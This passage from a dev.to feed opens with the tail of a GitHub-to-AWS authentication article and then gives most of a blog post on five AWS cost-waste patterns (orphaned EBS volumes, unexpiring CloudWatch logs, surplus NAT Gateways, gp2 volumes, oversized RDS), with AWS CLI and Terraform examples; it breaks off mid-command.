&lt;p&gt;This year, I've audited dozens of accounts, and the ratio of vulnerable to secure is alarming. Run the check above on your own account - I bet most of you won't like the answer.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Sources: &lt;a href="https://securitylabs.datadoghq.com/articles/exploring-github-to-aws-keyless-authentication-flaws/" rel="noopener noreferrer"&gt;Datadog Security Labs&lt;/a&gt;, &lt;a href="https://cloud.google.com/security/report/resources/cloud-threat-horizons-report-h1-2026" rel="noopener noreferrer"&gt;Google Cloud Threat Horizons H1 2026&lt;/a&gt;, &lt;a href="https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/" rel="noopener noreferrer"&gt;AWS Security Blog&lt;/a&gt;, &lt;a href="https://www.wiz.io/blog/avoiding-mistakes-with-aws-oidc-integration-conditions" rel="noopener noreferrer"&gt;Wiz Blog&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>githubactions</category>
      <category>devops</category>
    </item>
    <item>
      <title>AWS Cost Waste: 5 Things I Find in Every Audit</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 13 Mar 2026 22:08:57 +0000</pubDate>
      <link>https://dev.to/haitmg/aws-cost-waste-5-things-i-find-in-every-audit-1o89</link>
      <guid>https://dev.to/haitmg/aws-cost-waste-5-things-i-find-in-every-audit-1o89</guid>
      <description>&lt;p&gt;&lt;strong&gt;AWS cost waste&lt;/strong&gt; is money spent on cloud resources that deliver zero value - orphaned volumes, logs stored forever, idle databases, and infrastructure nobody remembers deploying. In most accounts, it adds up to 27-35% of the total bill.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Waste pattern&lt;/th&gt;
&lt;th&gt;Typical annual cost&lt;/th&gt;
&lt;th&gt;Fix effort&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Orphaned EBS volumes&lt;/td&gt;
&lt;td&gt;$2,000+ per TB&lt;/td&gt;
&lt;td&gt;1 Terraform line&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;CloudWatch logs without retention&lt;/td&gt;
&lt;td&gt;15% of monthly bill&lt;/td&gt;
&lt;td&gt;1 CLI command per log group&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Unnecessary NAT Gateways&lt;/td&gt;
&lt;td&gt;$1,166/year per 3-AZ setup&lt;/td&gt;
&lt;td&gt;Conditional Terraform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;gp2 volumes instead of gp3&lt;/td&gt;
&lt;td&gt;20% of EBS spend&lt;/td&gt;
&lt;td&gt;In-place migration, zero downtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Over-provisioned RDS&lt;/td&gt;
&lt;td&gt;$350+/month per idle instance&lt;/td&gt;
&lt;td&gt;Environment-aware sizing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;According to a Flexera report, organizations waste 27% of their cloud spending. I have mixed feelings about that number: in the audits I've conducted throughout my career, the figure has more often been closer to 35%. The exact number matters less than the fact that almost no one notices the wasted money until they actually look for it.&lt;/p&gt;

&lt;p&gt;Interestingly, these aren't exotic edge cases. The same pattern repeats itself: the same five problems show up at almost every customer. This article walks through them.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Orphaned EBS volumes
&lt;/h2&gt;

&lt;p&gt;Did you spin up EC2 instances for testing? Great. Did you test everything you needed to? Even better. Did you terminate the instances afterwards? Well, you're clearly a professional who cares about costs. But wait... did you really enable "Delete on termination" for their EBS volumes? Oh, no? And you've probably tested hundreds of instances over the last year? Let's be optimistic and say you had 50 of them. Each leftover volume costs 0.08-0.10 USD per GB per month. I'll leave the math to you.&lt;/p&gt;

&lt;p&gt;One audit reported 2.4 TB of orphaned volumes (across three regions). $2.3k just went "into the cloud" and nobody actually noticed. But who's going to stop a rich man?&lt;/p&gt;
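
&lt;p&gt;A back-of-the-envelope version of that math, assuming the lower rate of 0.08 USD per GB per month, 1 TB = 1,000 GB, and that the 2.4 TB sat unused for a full year (all three are assumptions for illustration):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;2.4 TB                = 2,400 GB
2,400 GB x 0.08 USD   = 192 USD per month
192 USD x 12 months   = 2,304 USD per year
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The same formula works for the 50 leftover test volumes: with a hypothetical 100 GB each, that is 50 x 100 GB x 0.08 USD = 400 USD per month.&lt;/p&gt;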

&lt;p&gt;&lt;strong&gt;Find them:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-volumes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--filters&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;status,Values&lt;span class="o"&gt;=&lt;/span&gt;available &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Volumes[].{ID:VolumeId,Size:Size,Type:VolumeType,Created:CreateTime}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If that table has more than zero rows, you're paying for storage nobody uses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_instance"&lt;/span&gt; &lt;span class="s2"&gt;"app"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;ami&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ami_id&lt;/span&gt;
  &lt;span class="nx"&gt;instance_type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;instance_type&lt;/span&gt;

  &lt;span class="nx"&gt;root_block_device&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;volume_type&lt;/span&gt;           &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;
    &lt;span class="nx"&gt;delete_on_termination&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;  &lt;span class="c1"&gt;# This is the line that matters&lt;/span&gt;
    &lt;span class="nx"&gt;encrypted&lt;/span&gt;             &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One line in your module. That's it. If your Terraform modules don't set this, every terminated instance leaves behind a volume that nobody will ever clean up.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. CloudWatch logs that never expire
&lt;/h2&gt;

&lt;p&gt;We like having application logs, don't we? Let's log everything: Lambda, all ECS tasks, every API Gateway - EVERYTHING! Retention? What if, in 15 years, someone asks why that ECS task crashed? Better not set it.&lt;/p&gt;

&lt;p&gt;Logs are just text, right? They are. And logging absolutely everything to CloudWatch isn't the problem either. The problem is never setting any retention on those logs. Honestly, how often do you read logs older than a few days? It happens. But logs from a month ago? They might be useful once every 5 years, and you'd survive without them. Yet whether you read them or not, you pay to store all of them. It looks like peanuts at only $0.03/GB per month, but it adds up faster than you think. I've seen accounts where CloudWatch was 15% of the monthly bill.&lt;/p&gt;

&lt;p&gt;The conclusion is simple: if you let AWS create log groups automatically (which is the default behavior), retention is infinite. Using Terraform? Then create the log group yourself with a retention policy and you won't have to worry about unusually high bills.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Find log groups with no retention:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws logs describe-log-groups &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'logGroups[?!retentionInDays].{Name:logGroupName,StoredBytes:storedBytes}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Fix immediately:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Set 30-day retention on a specific log group&lt;/span&gt;
aws logs put-retention-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--log-group-name&lt;/span&gt; &lt;span class="s2"&gt;"/aws/lambda/my-function"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--retention-in-days&lt;/span&gt; 30
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
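
&lt;p&gt;With many log groups, running that command by hand gets tedious. A minimal sketch that chains the two commands above into a loop, assuming 30 days is acceptable for every log group in the current region (try it on a single group first, and adjust the value where you have compliance requirements):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;# Apply 30-day retention to every log group that currently has none
aws logs describe-log-groups \
  --query 'logGroups[?!retentionInDays].logGroupName' \
  --output text | tr '\t' '\n' | while read -r name; do
    # Skip empty lines in the CLI output
    if [ -n "$name" ]; then
      aws logs put-retention-policy \
        --log-group-name "$name" \
        --retention-in-days 30
    fi
  done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;This only covers the region your CLI profile points at, so repeat it per region if you log in more than one.&lt;/p&gt;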



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Create the log group BEFORE the Lambda, so you control retention&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_cloudwatch_log_group"&lt;/span&gt; &lt;span class="s2"&gt;"lambda"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;              &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/aws/lambda/${var.function_name}"&lt;/span&gt;
  &lt;span class="nx"&gt;retention_in_days&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;30&lt;/span&gt;  &lt;span class="c1"&gt;# ALWAYS set this&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. NAT Gateways nobody needs
&lt;/h2&gt;

&lt;p&gt;Oh, I love this topic. You probably already know that NAT Gateways are not cheap. Just having one costs ~33 USD per month before a single byte has passed through it. Now imagine you need HA, so you run one NAT Gateway in each AZ, three in total. That's ~100 USD per month just for them to exist. On top of that, you pay 0.045 USD per GB processed.&lt;/p&gt;

&lt;p&gt;You know the problem? Most non-production environments seriously don't need three NAT Gateways. In fact, sometimes they don't need one at all.&lt;/p&gt;
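
&lt;p&gt;Roughly where those figures come from, assuming the us-east-1 list price of 0.045 USD per NAT Gateway hour and a 720-hour month (prices vary by region, so treat this as a sketch):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;0.045 USD x 720 h     = 32.40 USD per month per gateway
32.40 USD x 3 AZs     = 97.20 USD per month
97.20 USD x 12 months = 1,166.40 USD per year
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;That is the fixed cost alone, before any per-GB data processing charges.&lt;/p&gt;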

&lt;p&gt;&lt;strong&gt;Check utilization:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check bytes sent through one NAT Gateway over the last 7 days (GNU date syntax; repeat per gateway ID)&lt;/span&gt;
aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/NATGateway &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; BytesOutToDestination &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NatGatewayId,Value&lt;span class="o"&gt;=&lt;/span&gt;nat-0123456789abcdef0 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'7 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 604800 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Sum
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"environment"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# 1 NAT Gateway in dev/staging, N in production&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_nat_gateway"&lt;/span&gt; &lt;span class="s2"&gt;"main"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt; &lt;span class="p"&gt;==&lt;/span&gt; &lt;span class="s2"&gt;"prod"&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;azs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="nx"&gt;allocation_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_eip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;nat&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="nx"&gt;subnet_id&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_subnet&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;public&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;count&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
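
&lt;p&gt;One thing the snippet above leaves implicit: with a single NAT Gateway, the private route tables in every AZ have to point at that one gateway. A minimal sketch of the matching default route, assuming a hypothetical &lt;code&gt;aws_route_table.private&lt;/code&gt; with one table per AZ (it is not defined anywhere in this article, and neither is &lt;code&gt;var.azs&lt;/code&gt;):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumption: aws_route_table.private holds one route table per AZ in var.azs
resource "aws_route" "private_default" {
  count                  = length(var.azs)
  route_table_id         = aws_route_table.private[count.index].id
  destination_cidr_block = "0.0.0.0/0"

  # prod: each AZ uses its own NAT Gateway; elsewhere: every AZ shares index 0
  nat_gateway_id = aws_nat_gateway.main[var.environment == "prod" ? count.index : 0].id
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The trade-off is that non-production traffic from the other AZs crosses an AZ boundary to reach the shared gateway, so it pays cross-AZ data transfer and loses AZ-level redundancy. Outside production that is usually acceptable.&lt;/p&gt;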



&lt;p&gt;It's also worth checking whether your private subnets need internet access at all. Maybe some of them only talk to other AWS services? In that case VPC endpoints are a much cheaper option than NAT Gateways: gateway endpoints for S3 and DynamoDB have no hourly or per-GB charge at all.&lt;/p&gt;
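
&lt;p&gt;As a rough illustration, an S3 gateway endpoint attached to the private route tables could look like the sketch below. The names &lt;code&gt;aws_vpc.main&lt;/code&gt;, &lt;code&gt;aws_route_table.private&lt;/code&gt; and &lt;code&gt;var.region&lt;/code&gt; are placeholders, not resources defined in this article:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumptions: aws_vpc.main, aws_route_table.private and var.region are hypothetical
resource "aws_vpc_endpoint" "s3" {
  vpc_id            = aws_vpc.main.id
  service_name      = "com.amazonaws.${var.region}.s3"
  vpc_endpoint_type = "Gateway"

  # Adds an S3 prefix-list route to each private route table,
  # so S3 traffic no longer goes through the NAT Gateway
  route_table_ids = aws_route_table.private[*].id
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Other AWS services need interface endpoints instead, which are billed per hour and per GB, so compare them with your actual NAT Gateway traffic before switching.&lt;/p&gt;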

&lt;h2&gt;
  
  
  4. gp2 volumes that should be gp3
&lt;/h2&gt;

&lt;p&gt;This one is interesting too. The fix takes almost no effort, and yet I see the problem practically everywhere.&lt;/p&gt;

&lt;p&gt;I can guess where it comes from. Common wisdom says that newer (and a higher version number suggests newer) means more expensive. So someone who doesn't use AWS every day launches an EC2 instance, sees the choice between gp2 and gp3 EBS volumes, and thinks, "I'll go with the older, cheaper one." Mmm... good luck! gp3 is about 20% cheaper per GB than gp2 and comes with a baseline of 3,000 IOPS and 125 MB/s throughput regardless of volume size. Despite this, according to &lt;a href="https://www.datadoghq.com/state-of-cloud-costs/" rel="noopener noreferrer"&gt;Datadog's State of Cloud Costs&lt;/a&gt; report, gp2 accounts for 58% of EBS spending.&lt;/p&gt;

&lt;p&gt;For most volumes there's no scenario where gp2 is better - gp3 simply costs less and performs better. The one thing to watch is large gp2 volumes: their baseline grows with size (3 IOPS per GiB), so above roughly 1 TiB it exceeds gp3's default 3,000 IOPS, and you should provision extra IOPS and throughput on gp3 when migrating them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Find all gp2 volumes:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 describe-volumes &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--filters&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;volume-type,Values&lt;span class="o"&gt;=&lt;/span&gt;gp2 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s1"&gt;'Volumes[].{ID:VolumeId,Size:Size,State:State,Instance:Attachments[0].InstanceId}'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Migrate (no downtime):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws ec2 modify-volume &lt;span class="nt"&gt;--volume-id&lt;/span&gt; vol-0123456789abcdef0 &lt;span class="nt"&gt;--volume-type&lt;/span&gt; gp3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. No shutdowns, no snapshots, no maintenance window. The migration runs in the background while the volume stays attached and in use.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Prevent with Terraform:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"volume_type"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;string&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp3"&lt;/span&gt;

  &lt;span class="nx"&gt;validation&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;condition&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;volume_type&lt;/span&gt; &lt;span class="err"&gt;!&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"gp2"&lt;/span&gt;
    &lt;span class="nx"&gt;error_message&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Use gp3 instead of gp2. It's 20% cheaper with better baseline performance."&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A validation block in the EC2 module rejects gp2 at plan time. This prevents anyone from accidentally deploying a costly option.&lt;/p&gt;
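
&lt;p&gt;The validation only covers the volume type, not its sizing. Because gp2 baseline performance scales at 3 IOPS per GiB, a 2,000 GiB gp2 volume has a 6,000 IOPS baseline and up to 250 MiB/s of throughput, which is more than the gp3 defaults. A minimal sketch of a gp3 volume that keeps that level; &lt;code&gt;var.az&lt;/code&gt; is a hypothetical variable and the numbers are illustrative only:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# Assumption: var.az is a hypothetical variable holding the target AZ
resource "aws_ebs_volume" "data" {
  availability_zone = var.az
  size              = 2000            # GiB
  type              = var.volume_type # "gp3" by default, "gp2" rejected at plan time

  # Match what a 2,000 GiB gp2 volume delivered (3 IOPS per GiB, 250 MiB/s cap)
  iops       = 6000
  throughput = 250
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Provisioned IOPS and throughput above the gp3 baseline are billed separately, so check the pricing for your region; in many cases the total still comes out below the gp2 price.&lt;/p&gt;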

&lt;h2&gt;
  
  
  5. Over-provisioned RDS instances
&lt;/h2&gt;

&lt;p&gt;Time for dessert. Oh, how many companies are losing real money here. Let me give you an example. Something is due to launch in production in eight months, so the development environment gets exactly the same parameters production will have. Say that's a &lt;code&gt;db.r6g.xlarge&lt;/code&gt; instance. Cost? Let's say around $350 a month on average. Needed for development? Yes, about as much as a fish needs a bicycle.&lt;/p&gt;

&lt;p&gt;But this is still the rarer case. In production, I've more than once seen RDS instances whose average CPU utilization sits at 5-8%. The last time activity was that low was 2008, when the global financial crisis hit everyone.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check CPU utilization over the last 14 days:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; CPUUtilization &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'14 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--end-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--period&lt;/span&gt; 86400 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--statistics&lt;/span&gt; Average &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--output&lt;/span&gt; table
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Check for zero-connection databases:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;aws cloudwatch get-metric-statistics &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; AWS/RDS &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--metric-name&lt;/span&gt; DatabaseConnections &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--dimensions&lt;/span&gt; &lt;span class="nv"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;DBInstanceIdentifier,Value&lt;span class="o"&gt;=&lt;/span&gt;my-database &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--start-time&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt; &lt;span class="nt"&gt;-u&lt;/span&gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'7 days ago'&lt;/span&gt; +%Y-%m-%dT%H:%M:%S&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
